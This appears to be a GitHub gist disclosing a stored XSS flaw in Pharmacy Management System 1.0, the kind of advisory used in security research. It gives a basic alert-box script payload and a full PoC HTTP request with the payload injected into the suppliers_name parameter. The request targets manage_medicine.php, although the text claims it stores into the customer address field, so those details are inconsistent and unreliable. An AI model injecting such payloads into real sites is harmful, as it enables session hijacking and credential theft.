Skip to content

Instantly share code, notes, and snippets.

@higordiego
Created October 19, 2024 17:15
Show Gist options
  • Save higordiego/0dae6dd4a36acd12bcc408caf1c787d9 to your computer and use it in GitHub Desktop.
Save higordiego/0dae6dd4a36acd12bcc408caf1c787d9 to your computer and use it in GitHub Desktop.

Affected Version:

  • Pharmacy Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: Stored Cross-Site Scripting (XSS)
  • Severity: HIGH
  • Status: Unpatched

Vulnerable URL:

  • /php/manage_customer.php?action=update&id=4&name=Kiran%20Suthar&contact_number=1234567690&address=Andheri%20East&doctor_name=Anshari&doctor_address=test

Vulnerability Description:

A stored XSS vulnerability has been identified in the Pharmacy Management System version 1.0, specifically within the customer update functionality. This flaw occurs because user input fields, such as the name, address, or doctor_address parameters, are not properly sanitized. An attacker can inject malicious JavaScript code, which is stored in the database and executed each time the affected page is accessed.

The persistence of this XSS attack poses a high risk, as it can impact both administrators and users by enabling:

  • Session hijacking
  • Theft of sensitive information (e.g., login credentials)
  • Privilege escalation
  • Defacement or manipulation of web content

This vulnerability could allow attackers to perform more dangerous actions, such as stealing authentication cookies or altering critical data without detection.


Proof of Concept (PoC):

Below is an example of a malicious payload injected into the address field:

<script>alert('XSS');</script>

If this payload is stored, every time an administrator or user views the affected customer record, the script will execute, triggering the alert. A more sophisticated payload could redirect users to malicious sites or steal session cookies.


PoC Request:

GET /php/manage_medicine.php?action=update&id=2&name=Crosin&packing=1&generic_name=Aaaaa32131&suppliers_name=%3Cscript%3Ealert(%22/XSS/%22);%3C/script%3E HTTP/1.1
Host: localhost:8080
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
sec-ch-ua-mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/manage_medicine.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive


Once this request is executed, the payload is saved in the customer address field and executed every time the customer record is accessed.


XSS Example:

  • Stored XSS Example
  • Stored XSS Triggered

External Links:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment